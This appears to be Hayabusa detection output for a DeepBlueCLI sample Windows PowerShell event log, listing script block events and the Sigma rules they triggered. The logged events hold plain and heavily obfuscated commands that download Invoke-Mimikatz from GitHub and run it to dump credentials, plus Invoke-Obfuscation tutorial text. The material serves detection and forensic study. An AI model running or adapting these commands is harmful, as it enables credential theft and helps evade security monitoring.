.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:39.237 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:47.492 +00:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:57.725 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:01.084 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".((Gv '*mDR*').nAmE[3,11,2]-jOiN'')((('IEX (New'+'-Ob'+'jec'+'t Net.WebClient).DownloadString({0}ht'+'tps://'+'raw.git'+'hubus'+'ercontent.com/mattifest'+'ation/Po'+'werSploit/ma'+'st'+'er/Exfil'+'t'+'r'+'ati'+'on/Invoke'+'-Mimika'+'t'+'z'+'.ps1{'+'0}); Inv'+'oke-'+'Mi'+'m'+'ikat'+'z -Dum'+'p'+'Creds') -f[cHaR]39))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:01.084 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:19.204 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:44.958 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $PsHome[4]+$pshOME[34]+'X') 
((((""{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{10}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{31}{85}{88}{72}{25}{63}{32}{5}{39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{79}{20}{11}{59}{45}{17}{24}{84}{33}{21}{48}{71}{18}{23}{16}{28}{29}{80}{74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55}{8}"" -f'r','tiyJa','Ja','a*mDR*yJa).nAmE','it/ma','tyJ','IEX (New','ient)',')) ','CredsyJa','a','-M','dSt','J','3,11','J','nvyJa','t','yJa0','.D','keyJa+yJa','yJa+yJ','-ObyJa+','}); I','yJa','yJatps://yJa','aercontent.com','yJ','+','yJaoke-yJa+','ma','i','gi','z','+','+','Ja','yJa+y','myJa','a+yJahub',',2]-jOiNyJayJ','ebCl','/','at Ne','t.W','Ja+yJa','usyJa+','ty','a.ps1','yJa+yJaa','ow','Jas','DumyJa+yJa','yJa','Ja','cHaR]39','a+yJaer/','yJ',') -f[','imikay','ecyJ','pyJa+','ikaty','+yJaraw.','.','yJ','xfilyJa+yJatyJa+','a)(((yJa','nloa','Jaz -','yJa+y','{yJa+','}htyJa+','a+yJaat','yJa+y','ion/','sty','ttife','Ja+y','aon/Invo','yJaMi','+y','PoyJa','yJar','+yJa','ng({','+yJawerSplo','yJaj','0','E','((Gv yJ','[')) -cRepLAce ([ChaR]121+[ChaR]74+[ChaR]97),[ChaR]39))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:50.150 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:05.622 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Set-vaRiablE (""2K""+""h8"") ( ""NoIsSeRpxE-EkOVnI | )63]RAhc[,'6V0' eCALpER- 43]RAhc[,'t3a'eCALpER- 93]RAhc[,)17]RAhc[+48]RAhc[+37]RAhc[( ecalPerC- )' ))93]RahC[,)79]RahC[+47]RahC[+121'+']RahC[( ecALpeRc- ))G'+'TI['+'GTI,GTIJy 
vG((GTI,GTIEGTI,GTI0GTI,GTIjaJyGTI,GTIolpSrewaJy+GTI,GTI{(gnGTI,GTIa'+'Jy+GTI,GTIraJyGTI,GTIaJ'+'yoPGTI,GTIy+GTI,GTIiMaJyGTI,GTIovnI/noaGTI,GTIy+aJGTI,GTIefittGTI,GTIytsGTI,GTI/noiGTI,GTIy+aJyGTI,GTItaaJ'+'y+aGTI,GTI+aJyth}GTI,GTI+aJy{GTI,GTIy+aJyGTI,GTI- zaJGTI,GTIaolnGTI,GTIaJy((()aGTI,GTI+aJytaJy+aJylifxGTI,GTIJyGTI,GTI.GTI,GTI.waraJy+GTI,GT'+'IytakiGTI,GTI+aJypGTI,GTIJyceGTI,G'+'TIyakimiGTI,GTI[f- )GTI,GTIJyGTI,GTI/reaJ'+'y+aGTI,GTI93]RaHcGTI,GTIaJGTI,GTIaJyGTI'+',GTIaJy+a'+'Jym'+'uDGTI,GTIsaJGTI,GTIwoGT'+'I,GTIaaJy+aJyGT'+'I,GTI1sp.aGTI,GTIytGTI,GTI+aJys'+'uGTI,GTIaJy+aJGTI,GTIW.tGTI,GTIeN taGTI,GTI/GTI,GTIlCbeGTI,GTIJyaJy'+'NiOj-]2,GTI,GTIbuhaJy+aGTI,GTIaJymGTI,GTIy+aJyGTI,GTIaJGTI,GTI+GTI,GTI+GTI,GTIzGTI,GTIigGTI,GTIiGTI,GTIamGTI,GTI+aJy-ekoaJyGTI,GTI+GTI,GTIJyGTI,GTImoc.tnetnocreaGTI,GTIaJy//:sptaJyGTI,GT'+'IaJyGTI,GTII ;)}GTI,GTI+aJybO-GTI,GTI'+'J'+'y+aJyGTI,GTIaJy+aJyekGTI'+',GTID.GTI,GTI0aJyGTI,GTI'+'tGTI,GTIaJyvnGTI,GTIJGTI,GTI11,3GTI,GTIJGTI,GTItSdGTI,GTIM-GTI,GTIaGTI,GTIaJysderCGTI,GTI ))GTI,GTI)tneiGTI,GTIweN( XEIGTI,GTIJytGTI'+',GTIam/tiGTI'+',GTIEmAn.)aJy*RDm*aGTI,GTIaJGTI,GTIaJyitGTI,GTIrGTIf- t3a}8{}'+'55{}85{}9{}35{}16{}25{}96{}87{}26{}45{}18{}83{}2{}47'+'{}08{}92{}82{}61{}32{}81{}17{}84{}12{}'+'33{}48{}42{}71{}54{}9'+'5{}11{}02{}9'+'7{}72{}43{}1{}94{}38{}66{}98{}65{}31{}74{}15{}07{}4{}68{}28{}57{}37{}51{}67{}77{}03{}24{}62{}56{}64{}93'+'{}5{}23{}36{}52{}27{}88{}58{}13'+'{}0{}21{}86{}05{}91{}7{}14{}44{}34{}75{}53{}0'+'1{}06{}78{}22{}63{}73{}6{}76{}04{}41{}19{}3{}09{}46{t3a(((( )GTIXGTI+]43[EMOhsp6V0+]4[emoHsP6V0 (&'(("" ); .( $pshOME[4]+$PshOMe[34]+'x')( [STRInG]::jOiN( '', ( variabLE (""2K""+""H8"")).VAluE[ -1 ..-(( variabLE (""2K""+""H8"")).VAluE.leNGTH) ]) )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:05.642 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('&( 0V6PsHome[4]+0V6pshOME[34]+ITGXITG) 
((((a3t{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{1'+'0}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{'+'31}{85}{88}{72}{25}{63}{32}{5}{'+'39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{7'+'9}{20}{11}{5'+'9}{45}{17}{24}{84}{33'+'}{21}{48}{71}{18}{23}{16}{28}{29}{80}{'+'74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55'+'}{8}a3t -fITGrITG,ITGtiyJaITG,ITGJaITG,ITGa*mDR*yJa).nAmEITG,'+'ITGit/maITG,'+'ITGtyJITG,ITGIEX (NewITG,ITGient)ITG,ITG)) ITG,ITGCredsyJaITG,ITGaITG,ITG-MITG,ITGdStITG,ITGJITG,ITG3,11ITG,ITGJITG,ITGnvyJaITG,ITGt'+'ITG,ITGyJa0ITG,ITG.DITG,'+'ITGkeyJa+yJaITG,ITGyJa+y'+'J'+'ITG,ITG-ObyJa+ITG,ITG}); IITG,ITGyJaI'+'TG,ITGyJatps://yJaITG,ITGaercontent.comITG,ITGyJITG,ITG+ITG,ITGyJaoke-yJa+ITG,ITGmaITG,ITGiITG,ITGgiITG,ITGzITG,ITG+ITG,ITG+ITG,ITGJaITG,ITGyJa+yITG,ITGmyJaITG,ITGa+yJahubITG,ITG,2]-jOiN'+'yJayJITG,ITGebClITG,ITG/ITG,ITGat NeITG,ITGt.WITG,ITGJa+yJaITG,ITGu'+'syJa+ITG,ITGtyITG,ITGa.ps1ITG,I'+'TGyJa+yJaaITG,I'+'TGowITG,ITGJasITG,ITGDu'+'myJ'+'a+yJaITG,'+'ITGyJaITG,ITGJaITG,ITGcHaR]39ITG,ITGa+y'+'Jaer/ITG,ITGyJITG,ITG) -f[ITG,ITGimikayIT'+'G,ITGecyJITG,ITGpyJa+ITG,ITGikatyI'+'TG,ITG+yJaraw.ITG,ITG.ITG,ITGyJITG,ITGxfilyJa+yJatyJa+ITG,ITGa)(((yJaITG,ITGnloaITG,ITGJaz -ITG,ITGyJa+yITG,ITG{yJa+ITG,ITG}htyJa+ITG,ITGa+y'+'JaatITG,ITGyJa+yITG,ITGion/ITG,ITGstyITG,ITGttifeITG,ITGJa+yITG,ITGaon/InvoITG,ITGyJaMiITG,ITG+yITG,ITGPoy'+'JaITG,ITGyJarITG,ITG+yJ'+'aITG,ITGng({ITG,ITG+yJawerSploITG,ITGyJajITG,ITG0ITG,ITGEITG,ITG((Gv yJITG,ITG'+'[IT'+'G)) -cRepLAce ([ChaR]'+'121+[ChaR]74+[ChaR]97),[ChaR]39)) ') -CrePlace ([chAR]73+[chAR]84+[chAR]71),[chAR]39 -REpLACe'a3t',[chAR]34 -REpLACe '0V6',[chAR]36) | InVOkE-ExpReSsIoN",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:25.754 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" 
powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:43.056 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:43.075 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.154 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.166 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.171 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.174 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char 
= $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.176 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.180 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.181 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:44.236 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:46.183 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:46.196 
+00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:46.238 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:20:18.176 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:15.729 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:15.743 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.186 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
+2017-08-30 18:22:16.194 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.199 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.202 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.205 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.208 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.212 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.222 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.253 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:16.268 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. 
If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:17.070 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:17.087 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:17.127 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.147 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $PsHOME[21]+$pShOMe[30]+'x')( "" $( SET-ITeM 'vAriabLE:OFs' '')"" 
+[sTRing]('26K28!20%24l65J4e:76&3ai43i6f!4di73K50%45J63J5b:34!2cl31l35%2c&32i35%5d&2d!4aK4fJ69i6e&27l27%29&20!28i5bl73:54l52%49i4eJ67l5d%3a%3ai4a%4f:49K6el28K20:27&27:2ci20:28!28l37%33J2ci20!36l39!20:2c&38:38K20!2c!33:32K2ci20l34!30K20i2c&37i38&2c%31!30!31l2c:31:31K39J2cK34!35&2cJ37i39&20l2c%20l39J38l2cJ31%30K36i20J2cK31K30:31%2c!39i39&2ci31l31l36&2cl20J33&32!2c:20%37:38!20%2c!31i30i31i20:2c:20:31%31:36K2ci34l36K20:2cl38l37l2cJ31J30K31:20i2cl39K38l2cJ36&37%2c:20!31!30%38l2ci31&30!35%20%2c:20%31&30%31l2c!20K31&31K30!20&2c!31:31%36i20&2c!34:31l20J2c!34%36:2cl20&36!38!2c!20%31%31:31l2c!20l31&31i39:20J2cJ31&31i30K20J2c&31!30!38i20K2cK31&31J31:2cK20K39J37%2ci20K31K30K30K2c&20K38&33l20:2cJ20i31l31J36!20K2ci31:31!34!2c%20&31J30%35&20:2c&31l31:30:2cK31:30l33&20J2cK34i30l20J2c&33l39K2c&20!31:30&34J2c%31l31l36&20i2c&31i31i36i2c!31l31:32i2c!20l31i31!35&20l2c%35J38!2c:20%34!37!2c&20K34K37:20K2cl20%31%31!34:2c&39J37:20l2cK20K31J31i39l2c&20&34J36:20i2cJ20!31:30&33&2cJ31l30i35J20%2c!20l31i31K36!2cJ20i31J30K34%20:2cl31K31%37J2cl20:39i38:20i2c%31l31:37!2c!31i31!35i2c%20!31J30!31l2